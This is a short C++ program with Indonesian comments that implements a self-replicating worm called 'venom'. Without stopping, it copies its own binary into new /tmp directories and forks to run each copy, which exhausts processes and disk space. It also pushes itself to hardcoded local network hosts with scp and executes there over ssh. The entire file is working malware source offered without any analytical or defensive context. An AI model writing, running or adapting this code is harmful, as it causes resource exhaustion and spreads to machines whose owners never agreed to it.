#include <iostream>
#include <fstream>
#include <string>
#include <unistd.h>     // Untuk readlink(), fork()
#include <sys/stat.h>   // Untuk mkdir()
#include <cstdlib>      // Untuk system()
#include <ctime>        // Untuk seed generator angka acak

// Fungsi untuk mendapatkan nama file eksekusi
std::string get_self_filename() {
    char buffer[1024];
    ssize_t len = readlink("/proc/self/exe", buffer, sizeof(buffer) - 1);
    if (len == -1) {
        exit(1); // Gagal mendapatkan nama file
    }
    buffer[len] = '\0'; // Tambahkan null terminator
    return std::string(buffer);
}

// Fungsi untuk membuat salinan lokal
std::string create_local_copy(const std::string& self_filename, int counter) {
    std::string copy_dir = "/tmp/venom_chain_" + std::to_string(counter);
    mkdir(copy_dir.c_str(), 0700); // Buat direktori jika belum ada

    std::string copy_filename = copy_dir + "/venom_copy";
    std::ifstream self_file(self_filename, std::ios::binary);
    if (!self_file) {
        exit(1); // Gagal membuka file
    }

    std::ofstream copy_file(copy_filename, std::ios::binary);
    if (!copy_file) {
        exit(1); // Gagal membuat file salinan
    }

    copy_file << self_file.rdbuf();
    self_file.close();
    copy_file.close();

    return copy_filename;
}

// Fungsi untuk menjalankan salinan (Penyebaran Berantai)
void execute_copy(const std::string& copy_filename) {
    if (fork() == 0) { // Proses anak menjalankan salinan
        execl(copy_filename.c_str(), copy_filename.c_str(), nullptr);
        exit(0); // Keluar jika gagal menjalankan salinan
    }
}

// Fungsi untuk menyebarkan melalui jaringan menggunakan SSH dan SCP
void spread_to_network(const std::string& self_filename) {
    // Daftar perangkat jaringan (IP/hostname target)
    std::string targets[] = {"192.168.1.101", "192.168.1.102", "192.168.1.103"};

    for (const auto& target : targets) {
        // Salin file menggunakan scp
        std::string scp_command = "scp " + self_filename + " user@" + target + ":/tmp/venom_network_copy";
        system(scp_command.c_str());

        // Jalankan file pada target (opsional, memerlukan izin SSH)
        std::string ssh_command = "ssh user@" + target + " 'chmod +x /tmp/venom_network_copy && /tmp/venom_network_copy &'";
        system(ssh_command.c_str());
    }
}

int main() {
    srand(time(0)); // Seed untuk angka acak

    std::string self_filename = get_self_filename();

    int counter = 0;
    while (true) {
        // Penyebaran Berantai
        std::string local_copy = create_local_copy(self_filename, counter);
        execute_copy(local_copy);

        // Penyebaran Jaringan
        if (counter % 5 == 0) { // Setiap 5 iterasi, sebarkan melalui jaringan
            spread_to_network(self_filename);
        }

        counter++;
        sleep(1); // Tambahkan jeda agar tidak terlalu cepat
    }

    return 0;
}
